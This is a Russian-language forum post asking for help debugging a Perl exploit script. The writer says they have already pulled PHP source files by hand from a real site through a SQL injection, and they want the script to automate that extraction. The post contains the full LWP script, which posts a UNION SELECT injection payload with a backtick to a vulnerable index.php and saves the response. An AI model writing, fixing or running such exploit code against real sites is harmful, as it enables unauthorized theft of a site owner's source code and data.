Здраствуйте Не осилил всю ветку может где и поднималось. В общем есть задачка написать сплойт по вытаскиванию в познавательных целях php исходников с одного сайта через внедрение запроса к МySQL (используя обнаруженную SQL - injection и благоприятные права на чтение файлов у пользователя БД) Ручками я их уже повытягивал, используя InetCrack, но ввиду большого количества файлов столкнулся с большим количеством рутинных операций. Попробывал написать perl скрипт но столкнулся со сложностями. Дело в том, что для успешной SQL-injection используется обратная кавычка (см переменную sql_inj_str после param) Переменная успешно создается с обратным апострофом в теле, но вот серверу она в качестве контента передается не правильно(судя по ответу как обычная кавычка, которая фильтруется или я чего-то не догоняю) Я не большой специалист в PERLе так что помогите кто чем может Посмотрите пожалуйста код, может будут какие-то мнения?

#!/usr/bin/perl
# подключение библиотек
use strict;
use LWP;
use HTTP::Cookies;

# Путь к сайту и "ядовитый" запрос
my $url='test_site.ru';
my $sql_inj_str='param`+where+name=char(100,100,100)+ union+select+0,0,0,0,0,0,0,0,0,123456789,0+;+--+';

# подготавливаем виртуальный браузер и создаем файл для cookie
my $browser = LWP::UserAgent->new;
$browser->cookie_jar( HTTP::Cookies->new('file' => 'cookies','autosave' => 1));

# отправка запроса
my $script='/index.php?lang=ru&path=log'; #путь до уязвимого скрипта сервера
my $response = $browser->post($url.$script,
Content_Type => 'application/x-www-form-urlencoded',
Content =>
[
nick=>'Test_nick',
server=>$sql_inj_str,
,
]
);
die "$url error: ", $response->status_line unless $response->is_success;

# сохраняем страницу ответа в LOG
open(LOG,'>out_htm.htm');
print(LOG $sql_inj_str);
print(LOG $response->content);
close(LOG);